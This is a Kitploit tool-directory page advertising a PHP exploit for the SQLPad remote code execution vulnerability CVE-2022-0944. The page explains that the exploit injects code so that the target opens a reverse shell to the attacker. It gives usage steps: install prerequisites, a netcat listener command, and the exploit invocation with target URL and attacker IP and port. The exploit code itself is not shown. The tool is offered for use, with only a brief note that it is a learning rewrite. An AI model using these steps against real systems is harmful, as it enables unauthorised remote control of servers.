Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 Remote Code Execution Exploit | Kitploit
Tools/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 Remote Code Execution Exploit

View Repository
131 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

How It Works:

This PHP code is designed to exploit a Remote Code Execution (RCE) vulnerability in SQLPad, related to CVE-2022-0944.
It works by injecting malicious code into the SQLPad application, forcing it to execute a system command that opens a reverse shell – a connection that grants the attacker remote control of the vulnerable system.


Prerequisites:

  • PHP CLI – sudo apt-get install php-cli
  • cURL (PHP cURL library) – sudo apt-get install php-curl

Usage:

1. Setup the Listener (on the Attacker Machine)

To capture the reverse shell connection, start Netcat on the attacker’s machine:

root@kitploit:~
nc -lvnp 4444

Run the Exploit

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: The root URL of the vulnerable SQLPad (e.g., http://target.com:3000)

<attacker_ip>: The attacker’s IP address listening for the reverse connection (same as the Netcat IP)

<attacker_port>: The port on which the attacker is listening (same as the Netcat port)

References

The original exploit logic was based on this repository:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

My goal here was to understand the exploit logic and rewrite it in another programming language as a personal challenge.

Additional reference: 🔗 CVE-2022-0944 – NVD

Download Tool